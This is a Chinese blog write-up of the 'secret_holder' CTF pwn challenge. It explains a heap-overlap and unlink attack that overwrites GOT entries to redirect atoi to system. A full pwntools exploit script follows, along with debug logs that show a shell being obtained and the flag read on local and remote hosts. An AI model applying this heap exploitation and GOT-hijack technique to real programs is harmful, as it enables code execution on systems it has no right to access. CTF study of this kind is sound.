攻防世界-PWN-secret_holder-Unlink

最新推荐文章于 2022-08-30 17:44:45 发布
最新推荐文章于 2022-08-30 17:44:45 发布
阅读量424 收藏
点赞数
分类专栏: PWN CTF 文章标签: Unlink 攻防世界 PWN sercet_holder
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aptx4869_li/article/details/124001633
版权
CTF 同时被 2 个专栏收录
23 篇文章 0 订阅
订阅专栏
PWN
20 篇文章 0 订阅
订阅专栏

解题思路

保护机制

题目文件见文末连接,攻防世界平台上下载下来的不知道是啥东西

healer@healer-virtual-machine:~/Desktop/secret_holder$ checksec SecretHolder 
[*] '/home/healer/Desktop/secret_holder/SecretHolder'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
healer@healer-virtual-machine:~/Desktop/secret_holder$ readelf -h SecretHolder 
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400780
  Start of program headers:          64 (bytes into file)
  Start of section headers:          8632 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         28
  Section header string table index: 27

漏洞利用分析

简单分析之后程序操作的是这样一个内存结构

在这里插入图片描述

unsigned __int64 sub_400A27()
{
  int v0; // eax
  char s; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Which Secret do you want to wipe?");
  puts("1. Small secret");
  puts("2. Big secret");
  puts("3. Huge secret");
  memset(&s, 0, 4uLL);
  read(0, &s, 4uLL);
  v0 = atoi(&s);
  switch ( v0 )
  {
    case 2:
      free(qword_6020A0);
      dword_6020B8 = 0;
      break;
    case 3:
      free(qword_6020A8);
      dword_6020BC = 0;
      break;
    case 1:
      free(buf);
      dword_6020C0 = 0;
      break;
  }
  return __readfsqword(0x28u) ^ v3;
}

看完这部分第一反应是double free方法,但是尝试之后发现会触发报错

此题最难的地方就是huge chunk不在top chunk中,想要借助它配合前两个大小的堆块构造Unlink实现不了。

参考国外大佬的思路,通过申请huge chunksmall chunk,再free掉,然后再申请huge chunk,这样便可以另huge chunk落入top chunk中,然后free已经被free掉的small chunk,然后再申请,便可以令small chunk落入huge chunk

代码如下:

keep_secret(3,b"a"*0x10)    # 创建huge chunk
wipe_secret(3)              # 释放
keep_secret(1,b"b"*0x10)    # 创建small chunk
wipe_secret(1)              # 释放
keep_secret(3,b"a"*0x10)    # 再次创建huge chunk

完成后实现预期,且看内存情况:

wndbg> x/30xg 0x6020a0
0x6020a0:	0x0000000000000000	0x0000000000603010
0x6020b0:	0x0000000000603010	0x0000000100000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x61a91

Top chunk | PREV_INUSE
Addr: 0x664a90
Size: 0x20571

参见上文的表格,0x6020a8处为Huge Chunk的指针,此时所在位置为堆空间开始的位置,

紧接着通过如下代码实现将三个chunk堆在一起即small chunkbig chunkhuge chunk内部

wipe_secret(1)

keep_secret(1,b"d"*0x10)
keep_secret(2,b"e"*0x10)

将堆空间布置为如下状态:

pwndbg> vis

0x603000	0x0000000000000000	0x0000000000000031	........1.......
0x603010	0x6464646464646464	0x6464646464646464	dddddddddddddddd
0x603020	0x000000000000000a	0x0000000000000000	................
0x603030	0x0000000000000000	0x0000000000000fb1	................
0x603040	0x6565656565656565	0x6565656565656565	eeeeeeeeeeeeeeee
0x603050	0x000000000000000a	0x0000000000000000	................
···
0x603fe0	0x0000000000000000	0x0000000000081021	........!.......	 <-- Top chunk

此时上面的三个结构体布局如下所示

pwndbg> x/30xg 0x6020a0
0x6020a0:	0x0000000000603040	0x0000000000603010
                big chunk           hugu chunk
0x6020b0:	0x0000000000603010	0x0000000100000001
               small chunk        
0x6020c0:	0x0000000000000001	0x0000000000000000    # 三个标志位均置位为1

相当于是huge chunk包裹着small chunkbig chunk,此时便可以利用程序的renew功能,修改两个chunk空间的内容,布局触发Unlink,进而控制结构体区域

huge_chunk_ptr = 0x6020b0
payload = p64(0) + p64(0x21)
payload += p64(huge_chunk_ptr-0x18) + p64(huge_chunk_ptr-0x10)
payload += p64(0x20) + p64(0x90)
payload += b"1"* 0x88
payload += p64(0x91)   # 此处是构造多一个fake chunk,作用是Unlink时不会与top chunk合并
payload += b"1"* 0x88
payload += p64(0x81221)
renew_secret(3,payload)    # 修改堆空间数据

wipe_secret(2)   # 释放中间的那个堆块,触发Unlink

触发Unlink之后,结构体空间内,对应的Huge chunk指针被修改,指向结构体前面一点的位置

pwndbg> x/30xg 0x6020a0
0x6020a0:	0x0000000000603040	0x0000000000603010
0x6020b0:	0x0000000000602098	0x0000000100000000
0x6020c0:	0x0000000000000001	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000

此时便可通过程序的修改功能控制三个指针,指向特定内存,控制修改我们想要修改的内容

劫持3个指针,将free函数的got表地址修改很成为puts函数的plt,泄漏出atoi函数的地址,然后求得system函数的地址,再修改atoi函数的got地址表为system函数地址,当再次要求选择功能时,直接输入sh即可执行system("sh"),获取shell

payload = p64(0) + p64(atoi_got) + p64(free_got) + p64(atoi_got) + p32(1)*3   
# 第一个地址atoi_got,用于将free劫持为put.plt时泄漏atoi函数地址
# 第二个地址free_got,用于修改free函数的got表地址
# 第三个地址atoi_got,用于将atoi修改为system函数地址
# 最后的3个1用于确保三个指针指向的内存均可被修改,绕过程序自身的标识位检测
renew_secret(1,payload)

payload = p64(elf.plt["puts"])
renew_secret(3,payload)
# 借助第二个地址指针劫持free函数
wipe_secret(2)
# 借助第一个地址指针泄漏内存地址
io.recv(1)
atoi_byte = io.recv(6).ljust(8,b"\x00")

atoi_addr = u64(atoi_byte)
log.success("atoi address -> "+hex(atoi_addr))
obj = LibcSearcher("atoi",atoi_addr)
libcbase = atoi_addr - obj.dump("atoi")
system_addr = libcbase + obj.dump("system")
log.success("system address -> "+hex(system_addr))

renew_secret(1,p64(system_addr))
# 写入system函数地址,借助第三个地址指针
io.sendline("sh")

解题脚本

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
# context.terminal = ['tmux','splitw','-h']


io = remote("111.200.241.244",58629)  
# io = process("./SecretHolder")
elf = ELF("./SecretHolder")

# libc = ELF("./libc-2.31.so")
# context(arch = "i386", os = 'linux')

def keep_secret(secret_index,sercet):
	io.recvuntil("3. Renew secret")
	io.sendline("1")
	io.recvuntil("3. Huge secret")
	io.sendline(str(secret_index))
	io.recvuntil("Tell me your secret: ")
	io.send(sercet)

def wipe_secret(secret_index):
	io.recvuntil("3. Renew secret")
	io.sendline("2")
	io.recvuntil("3. Huge secret")
	io.sendline(str(secret_index))

def renew_secret(secret_index,sercet):
	io.recvuntil("3. Renew secret")
	io.sendline("3")
	io.recvuntil("3. Huge secret")
	io.sendline(str(secret_index))
	io.recvuntil("Tell me your secret: ")
	io.send(sercet)


def main(): 
	# gdb.attach(io,"b * 0x400a25\nb * 0x400b1c\nb * 0x400c66")
	keep_secret(3,b"a"*0x10)
	wipe_secret(3)
	keep_secret(1,b"b"*0x10)
	wipe_secret(1)
	keep_secret(3,b"c"*0x10)
	wipe_secret(1)

	keep_secret(1,b"d"*0x10)
	keep_secret(2,b"e"*0x10)
	# wipe_secret(1)
	# wipe_secret(2)

	# Unlink
	huge_chunk_ptr = 0x6020b0
	payload = p64(0) + p64(0x21)
	payload += p64(huge_chunk_ptr-0x18) + p64(huge_chunk_ptr-0x10)
	payload += p64(0x20) + p64(0x90)
	payload += b"1"* 0x88
	payload += p64(0x91)
	payload += b"1"* 0x88
	payload += p64(0x81221)
	renew_secret(3,payload)

	wipe_secret(2)
	log.success("Unlink Successfully")

	atoi_got = elf.got["atoi"]
	free_got = elf.got["free"]
	bss_addr = 0x6020c8
	payload = p64(0) + p64(atoi_got) + p64(free_got) + p64(atoi_got) + p32(1)*3
	renew_secret(1,payload)

	payload = p64(elf.plt["puts"])
	renew_secret(3,payload)
	wipe_secret(2)
	io.recv(1)
	atoi_byte = io.recv(6).ljust(8,b"\x00")
	# print(free_byte)
	atoi_addr = u64(atoi_byte)
	log.success("atoi address -> "+hex(atoi_addr))
	obj = LibcSearcher("atoi",atoi_addr)
	libcbase = atoi_addr - obj.dump("atoi")
	system_addr = libcbase + obj.dump("system")
	log.success("system address -> "+hex(system_addr))

	# renew_secret(1,"/bin/sh")
	renew_secret(1,p64(system_addr))

	io.sendline("sh")
	io.interactive()


if __name__ == '__main__':
	main()

执行情况

本地shell

[+] system address -> 0x7ffff7a523a0
[DEBUG] Sent 0x2 bytes:
    b'3\n'
[DEBUG] Received 0x50 bytes:
    b'Which Secret do you want to renew?\n'
    b'1. Small secret\n'
    b'2. Big secret\n'
    b'3. Huge secret\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x16 bytes:
    b'Tell me your secret: \n'
[DEBUG] Sent 0x8 bytes:
    00000000  a0 23 a5 f7  ff 7f 00 00                            │·#··│····│
    00000008
[DEBUG] Sent 0x3 bytes:
    b'sh\n'
[*] Switching to interactive mode

[DEBUG] Received 0x2e bytes:
    b'1. Keep secret\n'
    b'2. Wipe secret\n'
    b'3. Renew secret\n'
1. Keep secret
2. Wipe secret
3. Renew secret
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x23 bytes:
    b'core\t\t\t\t     exp.py  secret_holder\n'
core                     exp.py  secret_holder
[DEBUG] Received 0x3a bytes:
    b'dc98e2b2bd214d259dc699923214e8fc.gz  flag    SecretHolder\n'
dc98e2b2bd214d259dc699923214e8fc.gz  flag    SecretHolder
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x19 bytes:
    b'flag{Cragratulations!!!}\n'
flag{Cragratulations!!!}

远程shell

[*] Switching to interactive mode
[DEBUG] Received 0x1 bytes:
    b'\n'

[DEBUG] Received 0x2e bytes:
    b'1. Keep secret\n'
    b'2. Wipe secret\n'
    b'3. Renew secret\n'
1. Keep secret
2. Wipe secret
3. Renew secret
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x2b bytes:
    b'bin\n'
    b'dev\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'secret_holder\n'
bin
dev
flag
lib
lib32
lib64
secret_holder
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2d bytes:
    b'cyberpeace{e506b8*************d83b5f186fb}\n'
cyberpeace{e506b8*************d83b5f186fb}

详细内容参见我的Gitee项目,包含题目文件

aptx4869_li
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn 进阶 secret_holder
yongbaoii的博客
02-18 334
进去给了个网站让我自己下载附件,找半天没找到,最终还是嫖了个现成的。 https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder 看一手保护,PIE没有开,还好,RELRO也没有全开,第一想法可以考虑劫持一手GOT表。 又是菜单题,主程序简单,且有循环。 程序很简单,三个秘密,然后地址跟flag都在bss段上,分别占了八个跟四个字节。 同时calloc函数跟malloc函数一样,申请空间,区别是calloc函数会把申请到得空间都清零。
攻防世界PWNsecret_holder题解
seaaseesa的博客
02-07 1011
secret_holder 本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供 拿到附件,我们先检查一下程序的保护机制 然后,我们用IDA分析一下 Free后没有清空指针,可以造成多次重复free 可以多次创建堆,只要我们free后再创建即可 那么,本题,我们可以利用...
littleof ——攻防世界
qq_41696518的博客
08-30 1714
littleof ——攻防世界
攻防世界新手区刷题日记
Ching_jen的博客
02-22 1215
1、get_shell 打开题目,发现有一个题目场景,然后看题目描述说运行就能拿到shell,所以先运行一下,看看会发生什么,在虚拟机终端上输入nc+ip地址+ip端口(连接该网址),然后输入cat flag 发现运行一下flag就真的出来了。 2.CDfsb 这道题也给了一个题目场景,先尝试上面的方法将其运行一下,看看会发生什么 结果并不像上题这么直接,该题还给了一个附件,将其下载下来,先用...
攻防世界PWNsecret_file题解
seaaseesa的博客
11-10 1894
首先,我们看一下程序的保护机制 吓了一跳,几个关键保护全开。 然后,我们用IDA分析一下 好像很复杂的样子。以往的ROP这些都用不了。然而,只要这个条件成立,就可以执行popen了。 其中,我们发现v15是一个定值,在这里面被初始化,调试后发现是一个字符串9387a00e31e413c55af9c08c69cd119ab4685ef3bc8bcbe1cf82161119457127...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
攻防世界新——level3
weixin_62675330的博客
02-10 1420
攻防世界pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界-PWN-shell
aptx4869_li的博客
05-29 339
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3258
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2525
攻防世界的格式化字符串漏洞利用,简单题
攻防世界(新手篇)
热门推荐
sjt670994562的博客
06-02 1万+
作为刚刚进入reserve的小白,这几天在攻防世界的一些解题 no_strings_attached 一看没有exe,估计是linux的文件了,扔进C32Asm里 果然elf文件 先用扔进ida分析,发现主要函数authenticate,找到他的地址 OK,接下来就是扔到linux的gdb里面分析啦(这里我用的是peda显示的更方便点) 用b来下断点,b*0x08048708,然后r运行,n单...
攻防世界elrond32题解
SNiFe的博客
09-12 1680
攻防世界elrond32题解使用exeinfope查看文件信息分析反汇编代码编写代码获取flag 使用exeinfope查看文件信息 查看后发现是一个32位的ELF可执行文件,丢进IDA32查看反汇编代码 分析反汇编代码 首先找到main函数,F5查看伪代码 看见Access granted显然可知sub_8048538()函数是输出flag的函数,点开看看 看代码发现我们需要得到数组a2的值,于是回到main函数,发现a2与sub_8048414()函数有关,点开看看 分析函数,写出代码,得到a
攻防世界新手区level3
ca1m4n的博客
10-20 2194
攻防世界新手区level3 下载附件解压之后直接拖进虚拟机,发现还是个压缩包,原来是三个压缩包的套娃,重复操作:加一下后缀.zip解压,得到题目,题目把libc也给了 checksec level3 没什么保护,而且buf明显可以溢出 查找字符串果然如题目是没有system和binsh的 那么我们可以利用write函数(因为write调用过好几次了)得出偏移量,32位程序不同于64位需要寄存器传参而是可以直接传参的。 题目还直接给了libc 看之前写的32位程序的最基本的ret2libc原理就能会了
2018年全国大学生信息安全竞赛 CISCN Writeup
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
中级ROP-ret2__libc_csu_init
aptx4869_li的博客
08-01 2057
中级ROP-ret2__libc_csu_init 这个题是“百度杯”CTF比赛 十二月场上的一个题“easypwn” 题目文件:easypwn 链接:https://pan.baidu.com/s/1aPTSUMHT-1JR2yWJgo2B-g 密码:id3x 刚开始没多久,所以这个可能记录的比较详细一点,特别适合新手   静态分析找溢出点: 丢到IDA里面就一个主函数,也没有求其...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值